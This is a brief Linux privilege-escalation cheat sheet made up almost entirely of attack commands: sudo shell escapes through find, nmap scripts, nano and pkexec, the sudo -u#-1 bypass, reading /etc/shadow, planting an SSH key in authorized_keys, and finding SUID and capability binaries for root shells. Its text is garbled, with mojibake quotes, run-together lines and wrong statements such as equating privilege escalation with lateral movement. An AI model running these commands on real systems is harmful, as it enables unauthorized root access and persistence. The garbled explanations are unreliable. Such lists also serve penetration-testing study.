πCHEAT SHEET
PRIVILAGE ESCALATION CHEAT SHEET
Privilege escalation is step to gain illicit access of elevated right, or privilege beyond entitled for user. This attack perform to gain unauthorized access to system (root). It exploit human behavior, design flaws or oversight of Operating System. It also known as lateral movement in attack chain.
Cheat Sheat
Sudo - l
sudo find /bin -name nano -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo apache2 -f /etc/shadow
sudo su root or /bin/bash -p
NANO>>CTRL+R >> CTRL+X >>reset; sh 1>&0 2>&0
Sudo pkexec /bin/sh
(ALL:!root) /bin/bash
Sudo -u #-1 /bin/bash
Apache2 find in sudo -l
Sudo apache2 -f /etc/shadowDocker
www-data / no sudo (stable connection)
python -c 'import pty; pty.spawn("/bin/bash")'
Find specific file
Find / -name *.txt 2>/dev/null
Generate SSH key.
Our machine β$ ssh-keygen -f mykey
Target machine β$ echo β<mykey.pub>β > /.ssh/authorized_key
Chmod 600 mykey β change permission to public
Ssh -I mykey <targgetusername>@remoteIPSUID
Find / -perm -u=s -type f 2>/dev/null
Getcap -r / 2>/dev/nullFor getcap vuln -
/usr/bin/python2.6 -c βimport os;os.setuid(0);os.system(β/bin/bashβ)β
Cronjab tab
Cat /etc/crontab
Last updated